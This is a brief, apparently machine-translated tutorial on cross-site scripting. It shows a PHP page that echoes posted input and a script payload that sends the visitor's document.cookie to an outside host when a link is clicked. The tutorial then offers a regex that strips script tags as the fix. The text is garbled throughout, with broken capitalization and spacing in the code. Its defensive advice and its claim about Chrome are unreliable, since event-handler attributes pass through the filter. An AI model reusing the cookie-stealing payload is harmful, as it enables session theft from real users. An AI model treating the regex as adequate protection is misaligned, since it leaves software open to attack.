Xss (xss) Simple Example

<! Doctype html public "-// W3C // DTDHTML 4.01 Transitional //" http://www.w3.org/TR/html4/loose.dtd ">
<Html>
<Head>
<Title> New Document </title>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
</Head> www.2cto.com

<Body>
<Form action = "xss. php" name = "xss_form" id = "xss_form" method = "post">
<Textarea cols = "20" rows = "10" name = "tt" id = "tt"> </textarea>
<Input type = "submit" name = "submit" value = "submit">
</Form>
</Body>
</Html>

Enter the following content in the text box:

<Script>

Function test (){

Var img = new Image ();

Img. src = "http://www.caihuadadao.com? Cookie = "+ encodeURIComponent (document. cookie );

}

</Script>

<A href = "http://www.bkjia.com" onclick = "test ();"> click it and you're done. </a>

 

Only one line of code is required in xss. php.

Echo $ _ POST ['TT'];
 

Httpwatch (http://www.bkjia.com/soft/201109/29656.html) in ie8 can be seen, click "click you are done", you can see that sent an unfriendly http request.

 

Imagine a scenario: if an attacker posts a post on a website with the content above, then innocent users only need to click the link "click it to finish, the system automatically sends personal information to attackers.

 

The solution to the problem is relatively simple. Simply filter out the script tag and the content in the tag. The reliable system should remove the script tag from both the client and the server:

$ Str = preg_replace ('/<script [^>] *?>. *? <\/Script>/I ', '', $ str );

In chrome, When you click "click it to finish", the attacker will not send the http request, that is, the javascript code submitted by the attacker will not be executed, this fully proves that chrome is safer.